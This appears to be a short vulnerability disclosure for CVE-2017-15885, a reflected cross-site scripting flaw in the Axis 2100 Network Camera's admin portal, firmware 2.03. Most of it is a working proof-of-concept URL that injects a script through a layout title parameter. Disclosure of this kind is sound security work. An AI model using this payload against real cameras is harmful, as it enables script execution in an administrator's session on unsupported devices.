Update: this has been assigned CVE-2017-15885.
I have found a vulnerability in the Axis 2100 Network Camera running 2.03 firmware. Vulnerability has been disclosed to the vendor but the camera is no longer supported.
Reflected XSS in web administration portal in Axis 2100 Network Camera 2.03 allows attacker to execute arbitrary javascript via URL.
POC Verified on Firefox 55.0.3:
http://xxx.xxx.xxx,xxx/view/view.shtml?paramskip=yes&conf_Layout_BGColorEnabled=yes&conf_Layout_OwnBGColorEnabled=no&conf_Layout_OwnBGColor=White&conf_Layout_TextColorEnabled=yes&conf_Layout_OwnTextColorEnabled=no&conf_Layout_OwnTextColor=Black&conf_Layout_BackgroundEnabled=yes&conf_Layout_OwnBackgroundEnabled=no&conf_Layout_OwnBackground=http://&conf_Layout_TitleEnabled=yes&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3Cscript%3Ealert('test')%3C/script%3E&conf_Layout_LogoEnabled=yes&conf_Layout_OwnLogoEnabled=no&conf_Layout_OwnLogo=http%3A//&conf_Layout_LinkEnabled=yes&conf_Layout_OwnLinkEnabled=no&conf_Layout_OwnLink=http%3A//&conf_Layout_DescriptionEnabled=yes&conf_Layout_OwnDescriptionEnabled=no&conf_Layout_OwnDescription=&conf_Layout_RelayButtonsEnabled=yes&conf_Layout_AdminButtonsEnabled=yes&conf_Layout_LayoutEnabled=no
distributedcompute.com 